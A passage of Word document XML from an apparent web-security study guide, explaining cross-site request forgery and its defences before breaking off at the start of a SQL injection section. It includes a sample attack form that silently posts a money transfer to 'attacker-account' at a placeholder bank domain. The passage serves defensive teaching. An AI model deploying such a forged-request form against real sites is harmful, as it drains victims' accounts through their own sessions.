        <w:t>How CSRF Attacks Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F2E215" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="538"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The user logs into a web application and receives an authentication token (such as a session cookie).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D820AA" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="538"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Crafted Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The attacker crafts a request that performs an action on the web application using the victim’s credentials. This request is designed to be executed automatically when the victim interacts with a malicious site or email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0669D5DB" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="538"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The victim visits the malicious site or opens a malicious email. The site or email contains code (such as an image or hidden form) that automatically sends the crafted request to the target web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253DD999" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="538"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unwanted Action</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Because the request is sent with the victim’s credentials (e.g., cookies), the web application processes it as if it was legitimately initiated by the user, leading to unauthorized actions being performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D18E69" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example of a CSRF Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12512518" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Suppose a user is logged into their online banking application, which allows them to transfer money using a POST request to http://bank.com/transfer. The request might look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6724DD" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71"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&lt;form action="http://bank.com/transfer" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE357B" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71"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&lt;input type="hidden" name="account" value="attacker-account"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B56B1FC" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71"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&lt;input type="hidden" name="amount" value="1000"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F6E597" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71"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&lt;input type="submit" value="Transfer"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D2B1EA" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71"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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F003299" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>An attacker could create a page with this form and trick the victim into loading it. When the victim’s browser submits this form, it will use the victim’s authenticated session to perform the transfer without the victim’s consent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A21A8E" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Preventing CSRF Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E1A6E7" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CSRF Tokens</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CCECB7"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Tokens that are included in forms and validated on the server to ensure that requests originate from the expected source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A231E6"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Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Include a unique CSRF token in each form and verify the token on the server when the form is submitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10951BE5" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71"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&lt;input type="hidden" name="csrf-token" value="unique-token-value"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435BC92D" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SameSite Cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3341AAE6"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 cookie attribute that controls whether cookies are sent with cross-site requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79461471"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Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Set the SameSite attribute of cookies to Strict or Lax to prevent them from being sent with cross-site requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1DE769" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71"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Set-Cookie: sessionId=abc123; SameSite=Strict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48438E52" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Referer and Origin Header Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B7BE32"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Check the Referer or Origin headers to ensure that requests come from trusted sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E087F46"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Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Validate these headers on the server to ensure requests are coming from the expected domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6707649D" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use of Anti-CSRF Libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ABC01E"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Libraries that automatically handle CSRF protection by generating and validating tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F5F3A6"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Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use frameworks or libraries that have built-in support for CSRF protection, such as csurf for Express.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A90FC58" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Double-Submit Cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272DC264"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 technique where a CSRF token is sent in both a cookie and a request parameter, and the server validates that they match.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21874B13"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Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Include the CSRF token as a cookie and as a form parameter or HTTP header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E57DC16" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User Interaction Requirement</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA31D11"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Certain actions should require user interaction (e.g., re-entering passwords) to confirm the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F16A6" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="539"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Require users to provide additional authentication for sensitive actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5134D9B6" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7390FB3F" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secure Development Practices</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly review and test your application for CSRF vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C03A1D1" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Educate Users</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Inform users about the risks of clicking on unknown links or visiting suspicious sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DD23DB" w14:textId="1CB9B027" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Frameworks and Libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Leverage built-in CSRF protection mechanisms provided by web frameworks and libraries.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:vanish/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Top of FormBottom of Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B72F30" w14:textId="325DF9B1" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="_Toc178383340"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the concept of SQL injection attacks.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w14:paraId="7DBDBCD5" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of security vulnerability that occurs when an attacker is able to manipulate SQL queries executed by an application. This typically happens when user input is improperly sanitized or validated before being included in SQL statements. SQL Injection can lead to various malicious outcomes, including unauthorized access to or manipulation of database data, data breaches, and potential full system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730222D3" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How SQL Injection Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FEE4C6" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="541"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
